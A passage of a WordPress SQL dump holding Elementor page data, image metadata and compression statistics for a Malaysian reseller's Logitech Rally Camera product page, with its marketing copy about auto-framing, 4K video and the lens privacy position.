controls.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e2af137\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ca82ea0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-camera.jpg\",\"id\":2892}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f080e0a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6c69b5a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3ecdf9d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SEE EVERYONE, PERFECTLY FRAMED<\\/h3><p>Logitech RightSight\\u2122 camera control automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.<\\/p><p>Future Availability: RightSight will be enabled by a software download, with initial support for Windows 10.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c822b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d1e8d28\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b74d921\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/-xGIqpPOyXs\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"240e7e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2001884\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ENHANCED USER EXPERIENCE<\\/h3><p>Logitech RightSense\\u2122 is a suite of proactive technologies built into Rally Camera that automate a better user experience. RightSight\\u2122 automates camera control to perfectly frame participants, no matter their distance from the lens. RightLight\\u2122 optimises light balance and prioritises faces over objects and surfaces to render natural-looking skin tones. Plus, Rally Camera is compatible with virtually any video conferencing app right out of the box.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b84fa85\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5460384\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"975ce9d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PRIVACY ASSURANCE<\\/h3><p>When Rally Camera is not in use, the lens defaults to a parked position where the lens is pointed straight down. This provides visual affirmation that the camera is unable to \\u201csee\\u201d anything in the meeting space when idle. The lens lifts to a preset position when joining a meeting and parks automatically when the meeting ends. In addition, whenever video is muted during a meeting, a status light illuminates red to affirm visual privacy.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c7d6951\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2ab0660\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-camera-1.jpg\",\"id\":2894}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"450ebf7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a7d076b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4f621f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5197,2888,'_wp_page_template','template-fullwidth.php'),(5198,2888,'_elementor_edit_mode','builder'),(5199,2888,'_elementor_template_type','post'),(5200,2888,'_elementor_data','[{\"id\":\"86de509\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"33f9f97\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e581d05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Rally Camera<\\/h3><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control.<\\/p><ul><li>RightSense\\u2122 technology automates a better user experience<\\/li><li>Advanced optics frame every participant with amazing clarity<\\/li><li>Sleek industrial design for any professional meeting space<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fe7a801\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4c89bc6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(5221,2892,'_wp_attached_file','2019/02/rally-camera.jpg'),(5222,2892,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:24:\"2019/02/rally-camera.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"rally-camera-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"rally-camera-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"rally-camera-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"rally-camera-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"rally-camera-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"rally-camera-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"rally-camera-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5202,2885,'_elementor_version','0.4'),(5204,2889,'_wp_page_template','template-fullwidth.php'),(5205,2889,'_elementor_edit_mode','builder'),(5206,2889,'_elementor_template_type','post'),(5207,2889,'_elementor_data','[{\"id\":\"86de509\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"33f9f97\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e581d05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Rally Camera<\\/h3><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control.<\\/p><ul><li>RightSense\\u2122 technology automates a better user experience<\\/li><li>Advanced optics frame every participant with amazing clarity<\\/li><li>Sleek industrial design for any professional meeting space<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fe7a801\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4c89bc6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ffa2dfc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f116c41\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9992432\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Peerless Performance. Exceptional Versatility.<\\/h3><p><br \\/>With premium industrial design and an Ultra-HD imaging system, Rally Camera tops the lineup of standalone video cameras from Logitech\\u00ae. Packed with advanced optics and breakthrough technologies, Rally Camera delivers premium performance in professional meeting spaces of all shapes and sizes. With whisper-quiet mechanical Pan\\/Tilt\\/Zoom, razor-sharp 15X HD zoom, expansive 90\\u00b0 field of view, and powerful 4K sensor, Rally Camera captures every person in the room with truly phenomenal video quality.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5208,2889,'_elementor_version','0.4'),(5227,2893,'_elementor_template_type','post'),(5228,2893,'_elementor_data','[{\"id\":\"86de509\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"33f9f97\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e581d05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Rally Camera<\\/h3><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control.<\\/p><ul><li>RightSense\\u2122 technology automates a better user experience<\\/li><li>Advanced optics frame every participant with amazing clarity<\\/li><li>Sleek industrial design for any professional meeting space<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fe7a801\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4c89bc6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ffa2dfc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f116c41\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9992432\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Peerless Performance. Exceptional Versatility.<\\/h3><p><br \\/>With premium industrial design and an Ultra-HD imaging system, Rally Camera tops the lineup of standalone video cameras from Logitech\\u00ae. Packed with advanced optics and breakthrough technologies, Rally Camera delivers premium performance in professional meeting spaces of all shapes and sizes. With whisper-quiet mechanical Pan\\/Tilt\\/Zoom, razor-sharp 15X HD zoom, expansive 90\\u00b0 field of view, and powerful 4K sensor, Rally Camera captures every person in the room with truly phenomenal video quality.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c4ca731\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"aaa3964\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fe25005\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/TWRoAslIm0c\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"e7053cc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1508e06\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>STUDIO-QUALITY VIDEO<\\/h3><p>With an Ultra-HD imaging system, Rally Camera delivers brilliantly sharp video, outstanding colour, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLight\\u2122 technology optimises light balance to emphasise faces and render natural-looking skin tones, even in dim or backlit conditions.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6fc3397\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"314e459\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a243665\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SLEEK INDUSTRIAL DESIGN<\\/h3><p>Rally Camera incorporates world-class Logitech optics and 4K sensor in a premium industrial design suitable for any professional setting. Elegantly finished in matte black with slate gray metal trim, Rally Camera can be positioned on a table, mounted on a tripod, or secured to a wall with included hardware. For overhead installations, the camera detects when it\\u2019s inverted and automatically corrects image orientation and camera controls.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e2af137\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ca82ea0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-camera.jpg\",\"id\":2892}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f080e0a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6c69b5a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3ecdf9d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SEE EVERYONE, PERFECTLY FRAMED<\\/h3><p>Logitech RightSight\\u2122 camera control automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.<\\/p><p>Future Availability: RightSight will be enabled by a software download, with initial support for Windows 10.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c822b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d1e8d28\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b74d921\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/-xGIqpPOyXs\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"240e7e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2001884\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ENHANCED USER EXPERIENCE<\\/h3><p>Logitech RightSense\\u2122 is a suite of proactive technologies built into Rally Camera that automate a better user experience. RightSight\\u2122 automates camera control to perfectly frame participants, no matter their distance from the lens. RightLight\\u2122 optimises light balance and prioritises faces over objects and surfaces to render natural-looking skin tones. Plus, Rally Camera is compatible with virtually any video conferencing app right out of the box.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5223,2892,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.9367579052618424384490936063230037689208984375;s:5:\"bytes\";i:5225;s:11:\"size_before\";i:88011;s:10:\"size_after\";i:82786;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:274;s:11:\"size_before\";i:5048;s:10:\"size_after\";i:4774;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.79000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:391;s:11:\"size_before\";i:6754;s:10:\"size_after\";i:6363;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.6500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:1913;s:11:\"size_before\";i:28784;s:10:\"size_after\";i:26871;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.13999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:403;s:11:\"size_before\";i:6564;s:10:\"size_after\";i:6161;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.5099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:878;s:11:\"size_before\";i:15927;s:10:\"size_after\";i:15049;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.480000000000000426325641456060111522674560546875;s:5:\"bytes\";i:1366;s:11:\"size_before\";i:24934;s:10:\"size_after\";i:23568;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(5225,2893,'_wp_page_template','template-fullwidth.php'),(5226,2893,'_elementor_edit_mode','builder'),(5231,2894,'_wp_attached_file','2019/02/rally-camera-1.jpg'),(5232,2894,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:26:\"2019/02/rally-camera-1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"rally-camera-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"rally-camera-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"rally-camera-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"rally-camera-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"rally-camera-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"rally-camera-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"rally-camera-1-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5229,2893,'_elementor_version','0.4'),(5233,2894,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:16.875587988507209757926830206997692584991455078125;s:5:\"bytes\";i:6637;s:11:\"size_before\";i:39329;s:10:\"size_after\";i:32692;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.5;s:5:\"bytes\";i:237;s:11:\"size_before\";i:2787;s:10:\"size_after\";i:2550;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:447;s:11:\"size_before\";i:3521;s:10:\"size_after\";i:3074;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.260000000000001563194018672220408916473388671875;s:5:\"bytes\";i:2466;s:11:\"size_before\";i:12171;s:10:\"size_after\";i:9705;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.25;s:5:\"bytes\";i:418;s:11:\"size_before\";i:3412;s:10:\"size_after\";i:2994;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.190000000000001278976924368180334568023681640625;s:5:\"bytes\";i:1129;s:11:\"size_before\";i:6973;s:10:\"size_after\";i:5844;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.53999999999999914734871708787977695465087890625;s:5:\"bytes\";i:1940;s:11:\"size_before\";i:10465;s:10:\"size_after\";i:8525;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(5248,2000,'_elementor_edit_mode','builder'),(5249,2000,'_elementor_template_type','post'),(5235,2895,'_wp_page_template','template-fullwidth.php'),(5236,2895,'_elementor_edit_mode','builder'),(5237,2895,'_elementor_template_type','post'),(5238,2895,'_elementor_data','[{\"id\":\"86de509\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"33f9f97\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e581d05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Rally Camera<\\/h3><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control.<\\/p><ul><li>RightSense\\u2122 technology automates a better user experience<\\/li><li>Advanced optics frame every participant with amazing clarity<\\/li><li>Sleek industrial design for any professional meeting space<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fe7a801\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4c89bc6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ffa2dfc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f116c41\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9992432\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Peerless Performance. Exceptional Versatility.<\\/h3><p><br \\/>With premium industrial design and an Ultra-HD imaging system, Rally Camera tops the lineup of standalone video cameras from Logitech\\u00ae. Packed with advanced optics and breakthrough technologies, Rally Camera delivers premium performance in professional meeting spaces of all shapes and sizes. With whisper-quiet mechanical Pan\\/Tilt\\/Zoom, razor-sharp 15X HD zoom, expansive 90\\u00b0 field of view, and powerful 4K sensor, Rally Camera captures every person in the room with truly phenomenal video quality.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c4ca731\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"aaa3964\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fe25005\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/TWRoAslIm0c\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"e7053cc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1508e06\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>STUDIO-QUALITY VIDEO<\\/h3><p>With an Ultra-HD imaging system, Rally Camera delivers brilliantly sharp video, outstanding colour, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLight\\u2122 technology optimises light balance to emphasise faces and render natural-looking skin tones, even in dim or backlit conditions.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6fc3397\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"314e459\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a243665\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SLEEK INDUSTRIAL DESIGN<\\/h3><p>Rally Camera incorporates world-class Logitech optics and 4K sensor in a premium industrial design suitable for any professional setting. Elegantly finished in matte black with slate gray metal trim, Rally Camera can be positioned on a table, mounted on a tripod, or secured to a wall with included hardware. For overhead installations, the camera detects when it\\u2019s inverted and automatically corrects image orientation and camera controls.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e2af137\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ca82ea0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-camera.jpg\",\"id\":2892}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f080e0a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6c69b5a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3ecdf9d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SEE EVERYONE, PERFECTLY FRAMED<\\/h3><p>Logitech RightSight\\u2122 camera control automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.<\\/p><p>Future Availability: RightSight will be enabled by a software download, with initial support for Windows 10.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c822b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d1e8d28\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b74d921\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/-xGIqpPOyXs\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"240e7e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2001884\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ENHANCED USER EXPERIENCE<\\/h3><p>Logitech RightSense\\u2122 is a suite of proactive technologies built into Rally Camera that automate a better user experience. RightSight\\u2122 automates camera control to perfectly frame participants, no matter their distance from the lens. RightLight\\u2122 optimises light balance and prioritises faces over objects and surfaces to render natural-looking skin tones. Plus, Rally Camera is compatible with virtually any video conferencing app right out of the box.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b84fa85\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5460384\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"975ce9d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PRIVACY ASSURANCE<\\/h3><p>When Rally Camera is not in use, the lens defaults to a parked position where the lens is pointed straight down. This provides visual affirmation that the camera is unable to \\u201csee\\u201d 